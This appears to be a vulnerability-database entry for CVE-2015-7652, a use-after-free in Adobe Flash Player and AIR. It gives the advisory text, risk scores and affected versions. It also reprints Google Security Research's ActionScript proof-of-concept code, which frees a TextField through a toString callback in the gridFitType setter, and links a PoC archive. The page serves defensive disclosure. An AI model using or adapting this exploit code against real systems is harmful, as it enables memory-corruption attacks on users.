CVE-2015-7652

critical

Published 2015-11-11 · Modified 2026-05-06

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

Use-after-free vulnerability in Adobe Flash Player before 18.0.0.261 and 19.x before 19.0.0.245 on Windows and OS X and before 11.2.202.548 on Linux, Adobe AIR before 19.0.0.241, Adobe AIR SDK before 19.0.0.241, and Adobe AIR SDK & Compiler before 19.0.0.241 allows attackers to execute arbitrary code via a crafted gridFitType property value, a different vulnerability than CVE-2015-7651, CVE-2015-7653, CVE-2015-7654, CVE-2015-7655, CVE-2015-7656, CVE-2015-7657, CVE-2015-7658, CVE-2015-7660, CVE-2015-7661, CVE-2015-7663, CVE-2015-8042, CVE-2015-8043, CVE-2015-8044, and CVE-2015-8046.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-39020 dos windows verified text · 2 KB

Google Security Research · 2015-12-17

Adobe Flash TextField.gridFitType Setter - Use-After-Free

text exploit Source: Exploit-DB

Source: https://code.google.com/p/google-security-research/issues/detail?id=559

There is a use-after-free in the TextField gridFitType setter. If it is set to an object with a toString method that frees the TextField, the property will be written after it is freed.

A PoC is as follows:

var toptf = this.createEmptyMovieClip("toptf", 1);


function func(){
	
	toptf.removeMovieClip();	
	trace("here");
	return "none";
}

var o = {toString : func};


var my_format:TextFormat = new TextFormat();
my_format.font = "Times-12";

var my_text1:TextField = toptf.createTextField("my_text1", toptf.getNextHighestDepth(), 9.5, 10, 400, 100);
my_text1.text = "this.gridFitType = none";
my_text1.embedFonts = true;
my_text1.antiAliasType = "advanced";
my_text1.gridFitType = o;
my_text1.setTextFormat(my_format); 

var my_text2:TextField = toptf.createTextField("my_text2", toptf.getNextHighestDepth(), 9.5, 40, 400, 100);
my_text2.text = "this.gridFitType = advanced";
my_text2.embedFonts = true;
my_text2.antiAliasType = "advanced";
my_text2.gridFitType = "pixel";
my_text2.setTextFormat(my_format); 

var my_text3:TextField = toptf.createTextField("my_text3", toptf.getNextHighestDepth(), 9.5, 70, 400, 100);
my_text3.text = "this.gridFitType = subpixel";
my_text3.embedFonts = true;
my_text3.antiAliasType = "advanced";
my_text3.gridFitType = "subpixel";
my_text3.setTextFormat(my_format);

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39020.zip

OS impact

Linux kernel Fixed 1 release

Version	Status	Fixed in
-	Not affected	—

macOS Fixed 2 releases

Version	Status	Fixed in
-	Not affected	—
—	Not affected	—

Application impact

Vendor	Product	Versions
adobe	flash_player	`{"endIncluding":"18.0.0.255"}`
adobe	flash_player	`19.0.0.185`
adobe	flash_player	`19.0.0.207`
adobe	flash_player	`19.0.0.226`
adobe	air	`{"endIncluding":"19.0.0.190"}`
adobe	air_sdk	`{"endIncluding":"19.0.0.213"}`
adobe	air_sdk_\&_compiler	`{"endIncluding":"19.0.0.213"}`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.